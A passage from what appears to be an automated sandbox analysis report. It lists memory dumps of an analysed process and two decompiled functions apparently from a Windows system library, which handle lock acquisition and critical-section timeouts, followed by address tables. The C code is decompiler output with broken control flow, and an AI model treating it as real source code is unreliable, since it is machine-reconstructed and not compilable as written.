                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                                            • Opcode ID: 2b4d75e715357200838e301fb6025e603f26c7bbc6c214ac4444dab21ef146d2
                                                                                                                                                            • Instruction ID: f2cbd7dd39508b542c75f5ad5c3cbe0b92ca524cec0bdfd409af0fd2f96f7965
                                                                                                                                                            • Opcode Fuzzy Hash: 2b4d75e715357200838e301fb6025e603f26c7bbc6c214ac4444dab21ef146d2
                                                                                                                                                            • Instruction Fuzzy Hash: 9821C17290021A9BCF21EE58CC41AEAB3BCBB90710F564451FC46D3240DB74EE588BE2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                            			E009753A5(signed int _a4, char _a8) {
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t32;
                                                                                                                                                            				signed int _t37;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				signed int _t42;
                                                                                                                                                            				void* _t45;
                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                            				void* _t48;
                                                                                                                                                            				signed int _t49;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            				signed int _t57;
                                                                                                                                                            				signed int _t64;
                                                                                                                                                            				signed int _t71;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                            				signed int* _t79;
                                                                                                                                                            				void* _t85;
                                                                                                                                                            				signed int _t86;
                                                                                                                                                            				signed int _t92;
                                                                                                                                                            				void* _t104;
                                                                                                                                                            				void* _t105;
                                                                                                                                                            
                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                            				_t32 =  *(_t64 + 0x28);
                                                                                                                                                            				_t71 = _t64 + 0x28;
                                                                                                                                                            				_push(_t92);
                                                                                                                                                            				if(_t32 < 0) {
                                                                                                                                                            					_t78 =  *[fs:0x18];
                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                            					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                            						goto L3;
                                                                                                                                                            					} else {
                                                                                                                                                            						__eflags = _t32 | 0xffffffff;
                                                                                                                                                            						asm("lock xadd [ecx], eax");
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L3:
                                                                                                                                                            					_push(_t86);
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L4:
                                                                                                                                                            						__eflags = _t32;
                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _a8;
                                                                                                                                                            						if(_a8 == 0) {
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							return 0;
                                                                                                                                                            						} else {
                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            							_t79 = _t64 + 0x24;
                                                                                                                                                            							_t71 = 1;
                                                                                                                                                            							asm("lock xadd [eax], ecx");
                                                                                                                                                            							_t32 =  *(_t64 + 0x28);
                                                                                                                                                            							_a4 = _t32;
                                                                                                                                                            							__eflags = _t32;
                                                                                                                                                            							if(_t32 != 0) {
                                                                                                                                                            								L19:
                                                                                                                                                            								_t86 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00a301c0;
                                                                                                                                                            									_push(_t92);
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_t37 = E0094F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                            									__eflags = _t37 - 0x102;
                                                                                                                                                            									if(_t37 != 0x102) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t71 =  *(_t92 + 4);
                                                                                                                                                            									_t85 =  *_t92;
                                                                                                                                                            									_t51 = E00994FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                            									_push(_t85);
                                                                                                                                                            									_push(_t51);
                                                                                                                                                            									E009A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                            									E009A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                            									_t86 = _t86 + 1;
                                                                                                                                                            									_t105 = _t104 + 0x28;
                                                                                                                                                            									__eflags = _t86 - 2;
                                                                                                                                                            									if(__eflags > 0) {
                                                                                                                                                            										E009D217A(_t71, __eflags, _t64);
                                                                                                                                                            									}
                                                                                                                                                            									_push("RTL: Re-Waiting\n");
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_push(0x65);
                                                                                                                                                            									E009A3F92();
                                                                                                                                                            									_t104 = _t105 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t37;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t37);
                                                                                                                                                            									E00993915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									_t40 =  *_t71;
                                                                                                                                                            									 *_t71 = 0;
                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                            										L1:
                                                                                                                                                            										_t42 = E00975384(_t92 + 0x24);
                                                                                                                                                            										if(_t42 != 0) {
                                                                                                                                                            											goto L31;
                                                                                                                                                            										} else {
                                                                                                                                                            											goto L2;
                                                                                                                                                            										}
                                                                                                                                                            									} else {
                                                                                                                                                            										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                            										_push( &_a4);
                                                                                                                                                            										_push(_t40);
                                                                                                                                                            										_t49 = E0094F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                            										__eflags = _t49;
                                                                                                                                                            										if(__eflags >= 0) {
                                                                                                                                                            											goto L1;
                                                                                                                                                            										} else {
                                                                                                                                                            											_push(_t49);
                                                                                                                                                            											E00993915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                            											L31:
                                                                                                                                                            											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                            											_push( &_a4);
                                                                                                                                                            											_push(1);
                                                                                                                                                            											_t42 = E0094F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                            											__eflags = _t42;
                                                                                                                                                            											if(__eflags >= 0) {
                                                                                                                                                            												L2:
                                                                                                                                                            												return _t42;
                                                                                                                                                            											} else {
                                                                                                                                                            												_push(_t42);
                                                                                                                                                            												E00993915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                            												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                            												_push( &_a4);
                                                                                                                                                            												_push(1);
                                                                                                                                                            												_t42 = E0094F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                            												__eflags = _t42;
                                                                                                                                                            												if(__eflags >= 0) {
                                                                                                                                                            													goto L2;
                                                                                                                                                            												} else {
                                                                                                                                                            													_push(_t42);
                                                                                                                                                            													_t45 = E00993915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                            													asm("int3");
                                                                                                                                                            													while(1) {
                                                                                                                                                            														_t74 = _t45;
                                                                                                                                                            														__eflags = _t45 - 1;
                                                                                                                                                            														if(_t45 != 1) {
                                                                                                                                                            															break;
                                                                                                                                                            														}
                                                                                                                                                            														_t86 = _t86 | 0xffffffff;
                                                                                                                                                            														_t45 = _t74;
                                                                                                                                                            														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                            														__eflags = _t45 - _t74;
                                                                                                                                                            														if(_t45 != _t74) {
                                                                                                                                                            															continue;
                                                                                                                                                            														} else {
                                                                                                                                                            															_t46 =  *[fs:0x18];
                                                                                                                                                            															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                            															return _t46;
                                                                                                                                                            														}
                                                                                                                                                            														goto L38;
                                                                                                                                                            													}
                                                                                                                                                            													E00975329(_t74, _t92);
                                                                                                                                                            													_push(1);
                                                                                                                                                            													_t48 = E009753A5(_t92);
                                                                                                                                                            													return _t48;
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									_t32 =  *(_t64 + 0x28);
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t71 =  *_t79;
                                                                                                                                                            								__eflags = _t71;
                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                            									while(1) {
                                                                                                                                                            										_t57 = _t71;
                                                                                                                                                            										asm("lock cmpxchg [edi], esi");
                                                                                                                                                            										__eflags = _t57 - _t71;
                                                                                                                                                            										if(_t57 == _t71) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										_t71 = _t57;
                                                                                                                                                            										__eflags = _t57;
                                                                                                                                                            										if(_t57 > 0) {
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t32 = _a4;
                                                                                                                                                            									__eflags = _t71;
                                                                                                                                                            								}
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									goto L19;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L38;
                                                                                                                                                            					}
                                                                                                                                                            					_t71 = _t71 | 0xffffffff;
                                                                                                                                                            					_t32 = 0;
                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                            					__eflags = 0;
                                                                                                                                                            					if(0 != 0) {
                                                                                                                                                            						goto L4;
                                                                                                                                                            					} else {
                                                                                                                                                            						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L38:
                                                                                                                                                            			}


























                                                                                                                                                            0x009753ab
                                                                                                                                                            0x009753ae
                                                                                                                                                            0x009753b1
                                                                                                                                                            0x009753b4
                                                                                                                                                            0x009753b7
                                                                                                                                                            0x009905b6
                                                                                                                                                            0x009905c0
                                                                                                                                                            0x009905c3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009905c9
                                                                                                                                                            0x009905c9
                                                                                                                                                            0x009905cc
                                                                                                                                                            0x009905d5
                                                                                                                                                            0x009905d5
                                                                                                                                                            0x009753bd
                                                                                                                                                            0x009753bd
                                                                                                                                                            0x009753bd
                                                                                                                                                            0x009753be
                                                                                                                                                            0x009753be
                                                                                                                                                            0x009753be
                                                                                                                                                            0x009753c0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2269
                                                                                                                                                            0x009b226d
                                                                                                                                                            0x009b2349
                                                                                                                                                            0x009b234d
                                                                                                                                                            0x009b2273
                                                                                                                                                            0x009b2276
                                                                                                                                                            0x009b2279
                                                                                                                                                            0x009b227e
                                                                                                                                                            0x009b2283
                                                                                                                                                            0x009b2287
                                                                                                                                                            0x009b228a
                                                                                                                                                            0x009b228d
                                                                                                                                                            0x009b228f
                                                                                                                                                            0x009b22bc
                                                                                                                                                            0x009b22bc
                                                                                                                                                            0x009b22bc
                                                                                                                                                            0x009b22be
                                                                                                                                                            0x009b22c4
                                                                                                                                                            0x009b22cc
                                                                                                                                                            0x009b22d0
                                                                                                                                                            0x009b22d6
                                                                                                                                                            0x009b22d7
                                                                                                                                                            0x009b22da
                                                                                                                                                            0x009b22df
                                                                                                                                                            0x009b22e4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22e6
                                                                                                                                                            0x009b22e9
                                                                                                                                                            0x009b22f4
                                                                                                                                                            0x009b22f9
                                                                                                                                                            0x009b22fa
                                                                                                                                                            0x009b2305
                                                                                                                                                            0x009b2314
                                                                                                                                                            0x009b2319
                                                                                                                                                            0x009b231a
                                                                                                                                                            0x009b231d
                                                                                                                                                            0x009b2320
                                                                                                                                                            0x009b2323
                                                                                                                                                            0x009b2323
                                                                                                                                                            0x009b2328
                                                                                                                                                            0x009b232d
                                                                                                                                                            0x009b232f
                                                                                                                                                            0x009b2331
                                                                                                                                                            0x009b2336
                                                                                                                                                            0x009b2336
                                                                                                                                                            0x009b233b
                                                                                                                                                            0x009b233d
                                                                                                                                                            0x009b2350
                                                                                                                                                            0x009b2351
                                                                                                                                                            0x009b2356
                                                                                                                                                            0x009b2359
                                                                                                                                                            0x009b2359
                                                                                                                                                            0x009b235b
                                                                                                                                                            0x009b235d
                                                                                                                                                            0x00975367
                                                                                                                                                            0x0097536b
                                                                                                                                                            0x00975372
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2363
                                                                                                                                                            0x009b2363
                                                                                                                                                            0x009b2369
                                                                                                                                                            0x009b236a
                                                                                                                                                            0x009b236c
                                                                                                                                                            0x009b2371
                                                                                                                                                            0x009b2373
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2379
                                                                                                                                                            0x009b2379
                                                                                                                                                            0x009b237a
                                                                                                                                                            0x009b237f
                                                                                                                                                            0x009b237f
                                                                                                                                                            0x009b2385
                                                                                                                                                            0x009b2386
                                                                                                                                                            0x009b2389
                                                                                                                                                            0x009b238e
                                                                                                                                                            0x009b2390
                                                                                                                                                            0x00975378
                                                                                                                                                            0x0097537c
                                                                                                                                                            0x009b2396
                                                                                                                                                            0x009b2396
                                                                                                                                                            0x009b2397
                                                                                                                                                            0x009b239c
                                                                                                                                                            0x009b23a2
                                                                                                                                                            0x009b23a3
                                                                                                                                                            0x009b23a6
                                                                                                                                                            0x009b23ab
                                                                                                                                                            0x009b23ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b23b3
                                                                                                                                                            0x009b23b3
                                                                                                                                                            0x009b23b4
                                                                                                                                                            0x009b23b9
                                                                                                                                                            0x009b23ba
                                                                                                                                                            0x009b23ba
                                                                                                                                                            0x009b23bc
                                                                                                                                                            0x009b23bf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a9153
                                                                                                                                                            0x009a9158
                                                                                                                                                            0x009a915a
                                                                                                                                                            0x009a915e
                                                                                                                                                            0x009a9160
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a9166
                                                                                                                                                            0x009a9166
                                                                                                                                                            0x009a9171
                                                                                                                                                            0x009a9176
                                                                                                                                                            0x009a9176
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a9160
                                                                                                                                                            0x009b23c6
                                                                                                                                                            0x009b23cb
                                                                                                                                                            0x009b23ce
                                                                                                                                                            0x009b23d7
                                                                                                                                                            0x009b23d7
                                                                                                                                                            0x009b23ad
                                                                                                                                                            0x009b2390
                                                                                                                                                            0x009b2373
                                                                                                                                                            0x009b233f
                                                                                                                                                            0x009b233f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b233f
                                                                                                                                                            0x009b2291
                                                                                                                                                            0x009b2291
                                                                                                                                                            0x009b2293
                                                                                                                                                            0x009b2295
                                                                                                                                                            0x009b229a
                                                                                                                                                            0x009b22a1
                                                                                                                                                            0x009b22a3
                                                                                                                                                            0x009b22a7
                                                                                                                                                            0x009b22a9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22ab
                                                                                                                                                            0x009b22ad
                                                                                                                                                            0x009b22af
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22af
                                                                                                                                                            0x009b22b1
                                                                                                                                                            0x009b22b4
                                                                                                                                                            0x009b22b4
                                                                                                                                                            0x009b22b6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22b6
                                                                                                                                                            0x009b228f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b226d
                                                                                                                                                            0x009753cb
                                                                                                                                                            0x009753ce
                                                                                                                                                            0x009753d0
                                                                                                                                                            0x009753d4
                                                                                                                                                            0x009753d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009753d8
                                                                                                                                                            0x009753e3
                                                                                                                                                            0x009753ea
                                                                                                                                                            0x009753ea
                                                                                                                                                            0x009753d6
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B22F4
                                                                                                                                                            Strings
                                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009B22FC
                                                                                                                                                            • RTL: Re-Waiting, xrefs: 009B2328
                                                                                                                                                            • RTL: Resource at %p, xrefs: 009B230B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                            • API String ID: 885266447-871070163
                                                                                                                                                            • Opcode ID: b0e2a2f7ffed5b011c28f9dd62406f92a7812c3dc8c00195c2b138f377b2b1c8
                                                                                                                                                            • Instruction ID: 15d4b2e25242f53a4247ddec77f253f6f938b02b6652e7d0b419c09ece645af3
                                                                                                                                                            • Opcode Fuzzy Hash: b0e2a2f7ffed5b011c28f9dd62406f92a7812c3dc8c00195c2b138f377b2b1c8
                                                                                                                                                            • Instruction Fuzzy Hash: 21512A72600701ABEF15DF68CC81FA673DCEF94764F118629FD18DB291E6A1ED418790
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                            			E0097EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                            				short _v66;
                                                                                                                                                            				char _v72;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                            				signed int _t44;
                                                                                                                                                            				void* _t46;
                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                            				signed int _t49;
                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                            				signed char _t67;
                                                                                                                                                            				void* _t72;
                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                            				intOrPtr* _t85;
                                                                                                                                                            				void* _t91;
                                                                                                                                                            				void* _t92;
                                                                                                                                                            				void* _t93;
                                                                                                                                                            
                                                                                                                                                            				_t80 = __edi;
                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                            				_t70 = __ecx;
                                                                                                                                                            				_t84 = _a4;
                                                                                                                                                            				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                            					E0096DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                            					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                            				}
                                                                                                                                                            				_push(0);
                                                                                                                                                            				__eflags = _t38 - 0xffffffff;
                                                                                                                                                            				if(_t38 == 0xffffffff) {
                                                                                                                                                            					_t39 =  *0xa3793c; // 0x0
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push(_t84);
                                                                                                                                                            					_t40 = E009516C0(_t39);
                                                                                                                                                            				} else {
                                                                                                                                                            					_t40 = E0094F9D4(_t38);
                                                                                                                                                            				}
                                                                                                                                                            				_pop(_t85);
                                                                                                                                                            				__eflags = _t40;
                                                                                                                                                            				if(__eflags < 0) {
                                                                                                                                                            					_push(_t40);
                                                                                                                                                            					E00993915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                            					asm("int3");
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L21:
                                                                                                                                                            						_t76 =  *[fs:0x18];
                                                                                                                                                            						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                            						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                            						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                            							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                            							_v66 = 0x1722;
                                                                                                                                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_t76 =  &_v72;
                                                                                                                                                            							_push( &_v72);
                                                                                                                                                            							_v28 = _t85;
                                                                                                                                                            							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                            							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_push(0x10);
                                                                                                                                                            							_push(0x20402);
                                                                                                                                                            							E009501A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                            						}
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_t43 = _v8;
                                                                                                                                                            							_push(_t80);
                                                                                                                                                            							_push(0);
                                                                                                                                                            							__eflags = _t43 - 0xffffffff;
                                                                                                                                                            							if(_t43 == 0xffffffff) {
                                                                                                                                                            								_t71 =  *0xa3793c; // 0x0
                                                                                                                                                            								_push(_t85);
                                                                                                                                                            								_t44 = E00951F28(_t71);
                                                                                                                                                            							} else {
                                                                                                                                                            								_t44 = E0094F8CC(_t43);
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t44 - 0x102;
                                                                                                                                                            							if(_t44 != 0x102) {
                                                                                                                                                            								__eflags = _t44;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t44);
                                                                                                                                                            									E00993915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									E009D2306(_t85);
                                                                                                                                                            									__eflags = _t67 & 0x00000002;
                                                                                                                                                            									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                            										_t7 = _t67 + 2; // 0x4
                                                                                                                                                            										_t72 = _t7;
                                                                                                                                                            										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                            										__eflags = _t67 - _t67;
                                                                                                                                                            										if(_t67 == _t67) {
                                                                                                                                                            											E0097EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									return 0;
                                                                                                                                                            								} else {
                                                                                                                                                            									__eflags = _v24;
                                                                                                                                                            									if(_v24 != 0) {
                                                                                                                                                            										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                            									}
                                                                                                                                                            									return 2;
                                                                                                                                                            								}
                                                                                                                                                            								goto L36;
                                                                                                                                                            							}
                                                                                                                                                            							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                            							_push(_t67);
                                                                                                                                                            							_t46 = E00994FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                            							_push(_t77);
                                                                                                                                                            							E009A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                            							_t48 =  *_t85;
                                                                                                                                                            							_t92 = _t91 + 0x18;
                                                                                                                                                            							__eflags = _t48 - 0xffffffff;
                                                                                                                                                            							if(_t48 == 0xffffffff) {
                                                                                                                                                            								_t49 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                            							}
                                                                                                                                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_push(_t49);
                                                                                                                                                            							_t50 = _v12;
                                                                                                                                                            							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                            							_push(_t85);
                                                                                                                                                            							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                            							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                            							E009A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                            							_t53 =  *_t85;
                                                                                                                                                            							_t93 = _t92 + 0x20;
                                                                                                                                                            							_t67 = _t67 + 1;
                                                                                                                                                            							__eflags = _t53 - 0xffffffff;
                                                                                                                                                            							if(_t53 != 0xffffffff) {
                                                                                                                                                            								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                            								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t67 - 2;
                                                                                                                                                            							if(_t67 > 2) {
                                                                                                                                                            								__eflags = _t85 - 0xa320c0;
                                                                                                                                                            								if(_t85 != 0xa320c0) {
                                                                                                                                                            									_t76 = _a4;
                                                                                                                                                            									__eflags = _a4 - _a8;
                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                            										E009D217A(_t71, __eflags, _t85);
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							_push("RTL: Re-Waiting\n");
                                                                                                                                                            							_push(0);
                                                                                                                                                            							_push(0x65);
                                                                                                                                                            							_a8 = _a4;
                                                                                                                                                            							E009A3F92();
                                                                                                                                                            							_t91 = _t93 + 0xc;
                                                                                                                                                            							__eflags =  *0x7ffe0382;
                                                                                                                                                            							if( *0x7ffe0382 != 0) {
                                                                                                                                                            								goto L21;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L36;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					return _t40;
                                                                                                                                                            				}
                                                                                                                                                            				L36:
                                                                                                                                                            			}

































                                                                                                                                                            0x0097ec56
                                                                                                                                                            0x0097ec56
                                                                                                                                                            0x0097ec56
                                                                                                                                                            0x0097ec5c
                                                                                                                                                            0x0097ec64
                                                                                                                                                            0x009b23e6
                                                                                                                                                            0x009b23eb
                                                                                                                                                            0x009b23eb
                                                                                                                                                            0x0097ec6a
                                                                                                                                                            0x0097ec6c
                                                                                                                                                            0x0097ec6f
                                                                                                                                                            0x009b23f3
                                                                                                                                                            0x009b23f8
                                                                                                                                                            0x009b23fa
                                                                                                                                                            0x009b23fc
                                                                                                                                                            0x0097ec75
                                                                                                                                                            0x0097ec76
                                                                                                                                                            0x0097ec76
                                                                                                                                                            0x0097ec7b
                                                                                                                                                            0x0097ec7c
                                                                                                                                                            0x0097ec7e
                                                                                                                                                            0x009b2406
                                                                                                                                                            0x009b2407
                                                                                                                                                            0x009b240c
                                                                                                                                                            0x009b240d
                                                                                                                                                            0x009b240d
                                                                                                                                                            0x009b240d
                                                                                                                                                            0x009b2414
                                                                                                                                                            0x009b2417
                                                                                                                                                            0x009b241e
                                                                                                                                                            0x009b2435
                                                                                                                                                            0x009b2438
                                                                                                                                                            0x009b243c
                                                                                                                                                            0x009b243f
                                                                                                                                                            0x009b2442
                                                                                                                                                            0x009b2443
                                                                                                                                                            0x009b2446
                                                                                                                                                            0x009b2449
                                                                                                                                                            0x009b2453
                                                                                                                                                            0x009b2455
                                                                                                                                                            0x009b245b
